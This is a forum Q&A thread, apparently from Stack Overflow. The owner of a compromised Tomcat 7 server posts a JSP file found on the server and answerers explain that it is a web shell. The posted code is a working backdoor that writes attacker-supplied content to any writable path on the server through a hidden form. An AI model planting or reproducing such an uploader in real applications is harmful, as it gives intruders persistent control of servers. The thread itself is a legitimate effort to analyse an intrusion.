Reputation: 608
what is this code doing
I have a web application which has been recently exploited. The server is tomcat 7.0.42 . I have found files on server which I havent upload. Do you know why are they appearing? Here I show you the contents of one of these files, can anybody tell me what is it trying to do?
<%@ page language="java" pageEncoding="gbk"%>
<jsp:directive.page import="java.io.File"/>
<jsp:directive.page import="java.io.OutputStream"/>
<jsp:directive.page import="java.io.FileOutputStream"/>
<% int i=0; String method=request.getParameter("act"); if(method!=null && method.equals("yoco")) {
String url=request.getParameter("url");
String text=request.getParameter("smart");
File f=new File(url);
if(f.exists()) {
f.delete();
}
try{
OutputStream o=new FileOutputStream(f);
o.write(text.getBytes());
o.close();
} catch (Exception e) {
i++;
%>0<%
}
}
if(i==0){
%>1<%
}%>
<form action='?act=yoco' method='post'>
<input size="100" value="<%=application.getRealPath("/") %>" name="url">
<br>
<textarea rows="20" cols="80" name="smart">
Upvotes: 4
Views: 472
Answers (3)
Reputation: 12538
This looks like a rootkit providing remote control for attackers. They are making a form post to the same JSP servlet. When the post request is received parameter values sent to it via the POST request is held and processed;
String url=request.getParameter("url");
String text=request.getParameter("smart");
Notice the value received via parameter url is held in a variable url. They then check to make sure the parameter value, does exist as a file before deleting it - using;
File f=new File(url);
if(f.exists()) {
f.delete();
}
Finally the second parameter smart is held in parameter text. This is then used as the content of a new file created using parameter url as the file path.
OutputStream o=new FileOutputStream(f);
o.write(text.getBytes());
o.close();
Upvotes: 2
Reputation: 2204
This is method to write new files into your server.
This small .jsp process a GET request, if there is a 'yoco' and a 'url', it tries removes the file at the url, then it tries to write the content of the onto the file at the url parameter.
After the file is written, the file can be run typing down it's location.
Also it output 1 if it was successful, 0 if failed at the attempt to write the file.
Upvotes: 2
Reputation: 10038
This code takes a parameter called url and a parameter called text, takes the contents of text and writes it out to a file on the web server as defined by url.
Essentially, a client can upload arbitrary text to a file anywhere that is writable on the web / application server.
Sounds exactly like that happened.
Upvotes: 2
Related Questions
- Can someone explain what this Java code does?
- Explain what this code is doing
- <JSP,JQuery> can anyone explain this simple code?
- Unable to understand jsp syntax
- What exactly is the last piece of code doing?
- What does the following code do?
- Java code in jsp comment. How it works?
- What does the following do
- What does this line of code do?
- What does this condition do?